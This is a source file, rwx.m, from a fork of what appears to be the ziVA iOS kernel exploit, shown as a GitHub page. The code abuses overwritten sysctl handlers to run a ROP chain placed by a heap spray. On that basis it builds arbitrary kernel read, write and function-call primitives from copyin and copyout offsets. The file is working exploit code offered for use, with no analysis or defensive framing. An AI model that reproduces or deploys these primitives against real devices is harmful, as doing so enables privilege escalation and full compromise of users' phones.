forked from doadam/ziVA
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathrwx.m
116 lines (91 loc) · 2.57 KB
/
rwx.m
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
#include "rwx.h"
#include "offsets.h"
#include "log.h"
#include "heap_spray.h"
#include <sys/types.h>
#include <sys/sysctl.h>
#define SYSCTL_PREPARE_ROP ("hw.l1dcachesize")
#define SYSCTL_EXECUTE_ROP ("hw.l1icachesize")
/*
* Function name: rwx_trigger_handler
* Description: Calls the overwritten sysctl to execute the ROP chain.
* Returns: kern_return_t.
*/
static kern_return_t rwx_trigger_handler() {
kern_return_t ret = KERN_SUCCESS;
unsigned long oldp = 0;
size_t olds = 8;
if (sysctlbyname(SYSCTL_PREPARE_ROP, &oldp, &olds, NULL, 0))
{
ERROR_LOG("Error preparing ROP using %s: %s", SYSCTL_PREPARE_ROP, strerror(errno));
ret = KERN_ABORTED;
goto cleanup;
}
else if(0 != olds) {
ERROR_LOG("%s returned a normal size. seems like our sysctl handler wasn't installed.", SYSCTL_PREPARE_ROP);
ret = KERN_ABORTED;
goto cleanup;
}
olds = 8;
if (sysctlbyname(SYSCTL_EXECUTE_ROP, &oldp, &olds, NULL, 0))
{
ERROR_LOG("Error preparing ROP using %s: %s", SYSCTL_EXECUTE_ROP, strerror(errno));
ret = KERN_ABORTED;
}
else if (0 != olds) {
ERROR_LOG("%s returned a normal size. seems like our sysctl handler wasn't installed.", SYSCTL_EXECUTE_ROP);
ret = KERN_ABORTED;
goto cleanup;
}
cleanup:
return ret;
}
/*
* Function name: rwx_execute
* Description: Executes a kernel function with controlled parameters.
* Returns: kern_return_t.
*/
kern_return_t rwx_execute(void * func_addr, unsigned long arg0, unsigned long arg1, unsigned long arg2) {
kern_return_t ret = KERN_SUCCESS;
heap_spray_prepare_buffer_for_rop(func_addr,
arg0,
arg1,
arg2);
ret = rwx_trigger_handler();
if (KERN_SUCCESS != ret)
{
goto cleanup;
}
cleanup:
return ret;
}
/*
* Function name: rwx_read
* Description: Reads from a kernel address 'addr' into 'value', 'length' bytes.
* Returns: kern_return_t.
*/
kern_return_t rwx_read(void * addr, void * value, size_t length) {
kern_return_t ret = KERN_SUCCESS;
ret = rwx_execute(offsets_get_kernel_base() + OFFSET(copyout), (unsigned long)addr, (unsigned long)(value), length);
if (KERN_SUCCESS != ret)
{
goto cleanup;
}
cleanup:
return ret;
}
/*
* Function name: rwx_write
* Description: Writes to a kernel address 'addr' from buffer 'value', 'length' bytes.
* Returns: kern_return_t.
*/
kern_return_t rwx_write(void * addr, void * value, size_t length) {
kern_return_t ret = KERN_SUCCESS;
ret = rwx_execute(offsets_get_kernel_base() + OFFSET(copyin), (unsigned long)value, (unsigned long)addr, length);
if (KERN_SUCCESS != ret)
{
goto cleanup;
}
cleanup:
return ret;
}